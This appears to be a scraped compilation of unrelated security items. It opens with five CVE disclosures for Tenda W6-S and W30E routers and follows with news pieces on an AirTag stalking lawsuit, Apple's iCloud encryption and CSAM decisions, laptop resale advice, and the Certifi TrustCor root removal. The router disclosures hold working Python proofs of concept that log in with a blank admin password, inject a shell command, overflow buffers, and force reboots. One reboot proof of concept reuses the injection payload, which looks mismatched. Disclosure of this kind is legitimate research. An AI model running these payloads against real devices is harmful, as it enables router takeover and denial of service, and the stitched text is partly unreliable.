Tenda W6-S v1.0.0.4(510) was discovered to contain a command injection vulnerability in the tpi_get_ping_output function at /goform/exeCommand.

**Tenda W6-S V1.0.0.4(510) command injection vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/exeCommand, cmdinput is controlled by the user, it will be copied to s by vos\_strcpy, and finally tpi\_get\_ping\_output will be called to execute the command, which is not restricted, resulting in a command injection vulnerability

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/exeCommand'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'cmdinput=asd;ls -la . > ./tmp/test;aa'

requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

You can see that the command was executed successfully, and finally you can write exp to get the root shell

CVE-2022-45497: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda W6-S v1.0.0.4(510) was discovered to contain a stack overflow via the wl_radio parameter at /goform/wifiSSIDset.

**Tenda W6-S V1.0.0.4(510) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/wifiSSIDset, when wl\_radio is 0, the index will be spliced into v24 by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/wifiSSIDset'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'wl\_radio=0&index=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

After sending the poc, the router will crash, and finally we can write the exp to get the root shell

CVE-2022-45501: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda W30E V1.0.1.25(633) was discovered to contain a stack overflow via the cmdinput parameter at /goform/exeCommand.

Permalink

Cannot retrieve contributors at this time

**Tenda W30E V1.0.1.25(633) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2218.html
    

**Affected version**

**Vulnerability details**

In /goform/exeCommand, cmdinput will be copied to s by strcpy. It is worth noting that there is no size check, resulting in a stack overflow vulnerability

**Poc**

import requests

target\_url \= 'http://192.168.10.103/login/Auth'

target\_headers \= {'Host' : '192.168.10.103',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.103',
'Referer' : 'http://192.168.10.103/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.103/goform/exeCommand'

target\_headers \= {'Host' : '192.168.10.103',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.103',
'Referer' : 'http://192.168.10.103/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'cmdinput=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

You can see that the router crashed, and finally you can write an exp to get a root shell

CVE-2022-45505: IOT_Vul/readme.md at main · z1r00/IOT_Vul

An issue in the component tpi_systool_handle(0) (/goform/SysToolReboot) of Tenda W6-S v1.0.0.4(510) allows unauthenticated attackers to arbitrarily reboot the device.

Permalink

**Tenda W6-S V1.0.0.4(510) Reboot router without authentication****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/SysToolReboot, tpi\_systool\_handle(0) will cause the entire router to reboot without authorization

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/SysToolReboot'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'cmdinput=asd;ls -la . > ./tmp/test;aa'

requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

You can see that the router restarts

CVE-2022-45498: IOT_Vul/readme.md at main · z1r00/IOT_Vul

An issue in the component tpi_systool_handle(0) (/goform/SysToolRestoreSet) of Tenda W6-S v1.0.0.4(510) allows unauthenticated attackers to arbitrarily reboot the device.

Permalink

**Tenda W6-S V1.0.0.4(510) Reboot router without authentication****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/SysToolRestoreSet, tpi\_systool\_handle(0) will cause the entire router to reboot without authorization

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/SysToolRestoreSet'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'linkEn=1&ping1=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

You can see that the router restarts

CVE-2022-45504: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Two women have filed a lawsuit against Apple after former partners used AirTags to track them.



(Read more...)




The post Apple's AirTag stalker safeguards are "woefully inadequate," alleges lawsuit appeared first on Malwarebytes Labs.

Two women filed a proposed class-action lawsuit on Monday, December 5, in the United States District Court for the Northern District of California against Apple, the makers of AirTags.

Airtags are a small Bluetooth-enabled devices designed to track personal belongings. The suit accuses the company of failure to introduce measures to combat abuse of the technology as stalkers have and continue to use AirTags to track people. Both claimed their ex-partners did just that.

Lauren Hughes, one of the plaintiffs, learned she was being tracked in August 2021 after ending a three-month relationship. According to The New York Times, Hughes's stalker sent her threatening voicemails and made abusive posts on social media. She moved to a hotel after receiving plants from her stalker at her doorstep.

At the hotel, she received an iPhone notification that an unknown AirTag had been traveling with her. Eventually, Hughes found it in the wheel well of her car tire, colored with a Sharpie marker and wrapped in a plastic bag to disguise it. Discovering the AirTag "terrified" her. 

Hughes then found a new home, but months later, her stalker shared a picture of a taco truck in her new neighborhood, captioned with a winky emoji and the text "#airt2.0", the suit said. This, the suit alleges, showed the stalker's continued use of the AirTag to track Hughes.

"Ms. Hughes continues to fear for her safety—at minimum, her stalker has evidenced a commitment to continuing to use AirTags to track, harass, and threaten her, and continues to use AirTags to find her location," the suit said.

The second plaintiff, referred to as Jane Doe in the court papers, alleged that her ex-husband was stalking her when she found an AirTag planted in her child's backpack. She got rid of it, but it was replaced with another.

"In the wake of a contentious divorce, she found her former spouse harassing her, challenging her about where she went and when, particularly when she was with the couple's child," the suit said.

Apple introduced the AirTag in April 2021, with executives and publicists actively portraying the AirTag as a "harmless—indeed 'stalker-proof'"—product, the suit said. It's been a controversial product since its release and has raised concerns among privacy advocates and law enforcement that it could be misused to track people. And, true enough, AirTags have been used in stalking incidents, even murder, and theft of luxury cars.

In a blog post in February, Apple said it would add more safeguards to AirTags to curb unwanted tracking. Apple said it has been working with law enforcement to update the device's safety warnings, such as providing a privacy warning when using AirTags for the first time.

An Apple spokesperson also pointed to the February blog post about the company's stance on unwanted tracking:

> "AirTag was designed to help people locate their personal belongings, not to track people or another person's property, and we condemn in the strongest possible terms any malicious use of our products. Unwanted tracking has long been a societal problem, and we took this concern seriously in the design of AirTag."

The suit, however, alleges that Apple's safeguards were "woefully inadequate, and do little, if anything, to promptly warn individuals if they are being tracked."

Hughes and Doe are seeking a jury trial with no monetary damages.

**We don't just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Apple's AirTag stalker safeguards are "woefully inadequate," alleges lawsuit

Apple on Wednesday announced a raft of security measures, including an Advanced Data Protection setting that enables end-to-end encrypted (E2EE) data backups in its iCloud service.
The headlining feature, when turned on, is expected to secure 23 data categories using E2EE, including device and message backups, iCloud Drive, Notes, Photos, Reminders, Voice Memos, Safari Bookmarks, Siri Shortcuts,

Apple on Wednesday announced a raft of security measures, including an Advanced Data Protection setting that enables end-to-end encrypted (E2EE) data backups in its iCloud service.

The headlining feature, when turned on, is expected to secure 23 data categories using E2EE, including device and message backups, iCloud Drive, Notes, Photos, Reminders, Voice Memos, Safari Bookmarks, Siri Shortcuts, and Wallet Passes.

The iPhone maker said the only major iCloud data categories that are still not protected by E2EE are Mail, Contacts, and Calendar because of the "need to interoperate with the global email, contacts, and calendar systems" that use legacy technologies.

Advanced Data Protection's E2EE protections for iCloud also mean that users' personal data can only be decrypted on their trusted devices, which retain the encryption keys.

"If you enable Advanced Data Protection and then lose access to your account, Apple will not have the encryption keys to help you recover it — you'll need to use your device passcode or password, a recovery contact, or a personal recovery key," Apple explains in a support document.

With the latest move, Apple has addressed a long-standing criticism that it holds the encryption keys to iCloud backups, thereby making the information vulnerable to data breaches, law enforcement requests, and even Apple's own employees.

The use of encryption to safeguard user data has been inexorably intertwined with a challenge that's referred to as "going dark," wherein government agencies are hampered in their ability to gather incriminating digital evidence against serious crimes and other criminal investigations.

Alongside the news of expanded end-to-end encryption, Cupertino confirmed that it has abandoned its controversial plans for scanning messages for child sexual abuse material (CSAM) stored in iCloud Photos, according to reports from The Wall Street Journal and WIRED.

"Child sexual abuse can be headed off before it occurs," Craig Federighi, Apple's senior vice president of software engineering, was quoted as saying. "That's where we're putting our energy going forward."

In a related security-themed upgrade, Apple is also expanding two-factor authentication for Apple ID with support for hardware security keys and is launching a new iMessage security feature called Contact Key Verification to ensure that "they are messaging only with the people they intend."

The functionality, mainly geared towards journalists, human rights activists, and members of government, is designed such that automatic alerts are sent should a nation-state adversary successfully breach its cloud infrastructure and add a rogue Apple device to eavesdrop on the encrypted communications.

"And for even higher security, iMessage Contact Key Verification users can compare a Contact Verification Code in person, on FaceTime, or through another secure call," the tech giant said, mirroring a similar feature offered by Signal.

It is, however, worth noting at this point that iMessage is an instant messaging platform exclusive to the Apple ecosystem, and is not compatible with other major operating systems like Android and Windows.

These lock-in barriers also means that the new security protections cease to apply when communicating with users of Android smartphones, in which case Apple's Messages app delivers the chat content in the form of regular, unencrypted SMS messages.

Apple, for its part, has dismissed the idea of upgrading SMS/MMS to RCS, an improved messaging standard with E2EE, high quality media sharing, read receipts, and typing indicators.

The security features arrive nearly three months after Apple announced another optional feature called Lockdown Mode that is designed to protect iPhones and its other products against intrusions from state-backed hackers and commercial spyware.

Advanced Data Protection for iCloud is expected to be available to U.S. users by the end of the year with iOS 16.2, iPadOS 16.2, and macOS 13.1. The feature is set to be rolled out globally in 2023, alongside Security Keys for Apple ID and iMessage Contact Key Verification.

The upcoming iOS 16.2 update is also set to enforce an AirDrop limitation that was originally introduced in China with iOS 16.1.1, restricting wireless transfers from non-contacts in close proximity for only a period of 10 minutes in an effort to cut down on spam.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple Boosts Security With New iMessage, Apple ID, and iCloud Protections

By Owais Sultan
Before selling or trading in your laptop, it is important to prepare the device for its new owner as this will help ensure all of your personal data remains safe.
This is a post from HackRead.com Read the original post: Don’t Sell Your Laptop Without Following These Steps

In an age when every day, a new version of a laptop with better features, sleek design, and improved performance hits the market, it is no wonder that you also wish to buy a new laptop to achieve excellence in performance and enjoy new features.

You have money, you can buy a new laptop, great! But what about your previous laptop? If you are thinking of selling it, then…stop.

If you think selling a laptop is all about saving your data, finding a seller, and selling it, then you need to think again. It goes beyond this! It is not all about getting a fair price, but also saving your personal information and private data from reaching a stranger – that might cost you a lot if that stranger is fraudulent or malicious.

Before selling or trading in your laptop, it is important to prepare the device for its new owner. This can be done by taking several simple precautions that will help ensure all of your personal data remains safe.

**1 Save Your Important Data**

It goes without saying that your first step should be keeping a **backup of your essential data**, including personal and work-related files and folders, containing documents, presentations, emails, plans, strategies, or anything else that you have prepared with so much hard work.

If you don’t want to see your data slipping from your fingers, then this should be your number one step.

You can save your data on a data drive or upload it to a reliable **cloud service**. Or send them to your own email address (well, this is my favorite way of saving my data!). Do whatever suits you, but saving data is a must before selling your laptop.

However, this can only work if you have a few GB of data. In case you have terabytes of data then owning a workstation from companies like **Western Digital (WD)** is a good way to go.

**2 Delete Passwords Permanently**

Nobody wants the passwords of important accounts to get leaked. Full stop! But have you ever thought about how to save your passwords before giving your laptop? What — did you just say you can do it by signing off from all your accounts and deleting history and cookies? Ah, I wish it was really that easy, but it is not. 

Where technology has brought so much **ease into our lives**, there it has also become a trouble in many ways — like this one. Unfortunately, some software can extract passwords even if you log out from your accounts.

That is where you should act smartly if you don’t want someone to sneak into your Facebook and start sending weird messages through your accounts to your friends. It could trigger so many controversies – eh. So, cut iron with iron.

You can also use apps such as password generators. One such example is the **IPVanish** password generator which lets users delete passwords permanently from their browsers. If you wish to do that manually, follow these easy steps:

**For Chrome browser:** First, open Chrome and click on the three-dot menu icon located in the top right corner. Then select “Settings” and click on “Passwords” under Autofill. Here you will find a list of all the websites that have saved credentials, along with their usernames and passwords.

Select an entry to see the details, then click on the three-dot menu icon next to it and select “Remove.” You’ll be asked to confirm by clicking “remove” again; once confirmed all login information for that website will be deleted from your computer. (_Read more on_ **Google**.)

**For Firefox:** First, launch the Firefox browser on your device. Then, click the ‘Menu’ icon (three lines in the upper right corner) and select ‘Options’ or ‘Preferences’. In this menu, you will see a section for ‘Logins & Passwords. You can then scroll through all of your saved logins and passwords until you find the one that needs to be deleted.

**For Safari Browser:** To begin, open up the Safari browser on your computer and click the ‘Safari’ menu at the top left corner. In that menu option, select ‘Preferences’ and then navigate to the ‘Passwords’ tab. (Read more on **Mozilla**.)

Here you will see a list of all of your stored passwords that have been saved by Safari. To delete one or more of these passwords, simply check off each box next to each entry that you wish to remove and hit delete in the bottom right corner. (Read more on **Apple**.)

**3 Format the Drive**

Have you saved your important data? Great! Now, what about data that is still on your laptop? Obviously, you can’t leave it like this for others to see your private information and confidential data. No, just deleting data files and clearing Recycle Bin or Shift + Delete might not work. It can still keep the issue of data leakage and privacy breaches there. 

In this condition, most people go for drive formatting that cleans up your laptop and makes it data free. However, this method works if your files are overwritten and you are using a solid-state drive (SSD) with TRIM enabled.

With HDD or TRIM disabled, you would have to overwrite the hard drive if you don’t want cheap software to recover your data – yes, even after formatting. It is very easy to recover a permanently deleted file through even cheap software. So, be safe than sorry!

**4 Prepare Your Laptop for Selling**

Once you are done saving your information, next, it is time to prepare your laptop for sale at a good price. The price of your gadget also depends on its model, functionalities, current market price, and a lot more. However, improving the outer condition, and speed, upgrading Windows, and enhancing the memory storage can enhance the price of your laptop. 

So, work on the following things to get good bucks:

*   First, install the latest Windows to make your buyer happy. You can vow anyone with the latest functionalities already installed on the laptop, so that person wouldn’t have to go through all the trouble. It is a good chance to impress a buyer.

*   Second, work on the speed of the laptop. Half of the work is already done when you delete files and data. So, reset the laptop to speed it up.

*   Clean up your laptop, please. Don’t take your laptop to a buyer with all the lint or dust trapped between keys and scratches on the screen. You can remove lint or dust with a brush and change the screen cover. This simple work can make a lot of difference.

*   Lastly, visit a laptop expert and ask for a thorough inspection so that you can rectify if there are any internal faulty parts.

1.  **World’s most dangerous laptop has been sold for $1.3 million**
2.  **BusKill USB cable switches off your laptop in the event of theft**
3.  **German army’s sensitive data found on laptop bought from eBay**
4.  **World’s most dangerous laptop ‘Persistence of Chaos’ up for auction**

Don’t Sell Your Laptop Without Following These Steps

Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL certificates while verifying the identity of TLS hosts. Certifi 2022.12.07 removes root certificates from "TrustCor" from the root store. These are in the process of being removed from Mozilla's trust store. TrustCor's root certificates are being removed pursuant to an investigation prompted by media reporting that TrustCor's ownership also operated a business that produced spyware. Conclusions of Mozilla's investigation can be found in the linked google group discussion.

CVE-2022-23491: concerns about Trustcor

The company plans to expand its Communication Safety features, which aim to disrupt the sharing of child sexual abuse material at the source.

In August 2021, Apple announced a plan to scan photos that users stored in iCloud for child sexual abuse material (CSAM). The tool was meant to be privacy-preserving and allow the company to flag potentially problematic and abusive content without revealing anything else. But the initiative was controversial, and it soon drew widespread criticism from privacy and security researchers and digital rights groups who were concerned that the surveillance capability itself could be abused to undermine the privacy and security of iCloud users around the world. At the beginning of September 2021, Apple said it would pause the rollout of the feature to “collect input and make improvements before releasing these critically important child safety features.” In other words, a launch was still coming. Now the company says that in response to the feedback and guidance it received, the CSAM-detection tool for iCloud photos is dead.

Instead, Apple told WIRED this week, it is focusing its anti-CSAM efforts and investments on its “Communication Safety” features, which the company initially announced in August 2021 and launched last December. Parents and caregivers can opt into the protections through family iCloud accounts. The features work in Siri, Apple’s Spotlight search, and Safari Search to warn if someone is looking at or searching for child sexual abuse materials and provide resources on the spot to report the content and seek help. Additionally, the core of the protection is Communication Safety for Messages, which caregivers can set up to provide a warning and resources to children if they receive or attempt to send photos that contain nudity. The goal is to stop child exploitation before it happens or becomes entrenched and reduce the creation of new CSAM.

“After extensive consultation with experts to gather feedback on child protection initiatives we proposed last year, we are deepening our investment in the Communication Safety feature that we first made available in December 2021,” the company told WIRED in a statement. “We have further decided to not move forward with our previously proposed CSAM detection tool for iCloud Photos. Children can be protected without companies combing through personal data, and we will continue working with governments, child advocates, and other companies to help protect young people, preserve their right to privacy, and make the internet a safer place for children and for us all.”

Apple’s CSAM update comes alongside its announcement today that the company is vastly expanding its end-to-end encryption offerings for iCloud, including adding the protection for backups and photos stored on the cloud service. Child safety experts and technologists working to combat CSAM have often opposed broader deployment of end-to-end encryption because it renders user data inaccessible to tech companies, making it more difficult for them to scan and flag CSAM. Law enforcement agencies around the world have similarly cited the dire problem of child sexual abuse in opposing the use and expansion of end-to-end encryption, though many of these agencies have historically been hostile toward end-to-end encryption in general because it can make some investigations more challenging. Research has consistently shown, though, that end-to-end encryption is a vital safety tool for protecting human rights and that the downsides of its implementation do not outweigh the benefits.

Communication Safety for Messages is opt-in and analyzes image attachments users send and receive on their devices to determine whether a photo contains nudity. The feature is designed so Apple never gets access to the messages, the end-to-end encryption that Messages offers is never broken, and Apple doesn’t even learn that a device has detected nudity.

The company told WIRED that while it is not ready to announce a specific timeline for expanding its Communication Safety features, the company is working on adding the ability to detect nudity in videos sent through Messages when the protection is enabled. The company also plans to expand the offering beyond Messages to its other communication applications. Ultimately, the goal is to make it possible for third-party developers to incorporate the Communication Safety tools into their own applications. The more the features can proliferate, Apple says, the more likely it is that children will get the information and support they need before they are exploited. 

“Potential child exploitation can be interrupted before it happens by providing opt-in tools for parents to help protect their children from unsafe communications,” the company said in its statement. “Apple is dedicated to developing innovative privacy-preserving solutions to combat Child Sexual Abuse Material and protect children, while addressing the unique privacy needs of personal communications and data storage.”

Similar to other companies that have grappled publicly with how to address CSAM—including Meta—Apple told WIRED that it also plans to continue working with child safety experts to make it as easy as possible for its users to report exploitative content and situations to advocacy organizations and law enforcement.

"Technology that detects CSAM before it is sent from a child’s device can prevent that child from being a victim of sextortion or other sexual abuse, and can help identify children who are currently being exploited,” says Erin Earp, interim vice president of public policy at the anti-sexual violence organization RAINN. “Additionally, because the minor is typically sending newly or recently created images, it is unlikely that such images would be detected by other technology, such as Photo DNA. While the vast majority of online CSAM is created by someone in the victim’s circle of trust, which may not be captured by the type of scanning mentioned, combatting the online sexual abuse and exploitation of children requires technology companies to innovate and create new tools. Scanning for CSAM before the material is sent by a child’s device is one of these such tools and can help limit the scope of the problem.” 

Countering CSAM is a complicated and nuanced endeavor with extremely high stakes for kids around the world, and it’s still unknown how much traction Apple’s bet on proactive intervention will get. But tech giants are walking a fine line as they work to balance CSAM detection and user privacy.

_Updated 5:20pm ET, Wednesday, December 7, 2022 to include commentary from RAINN._

Tag

#apple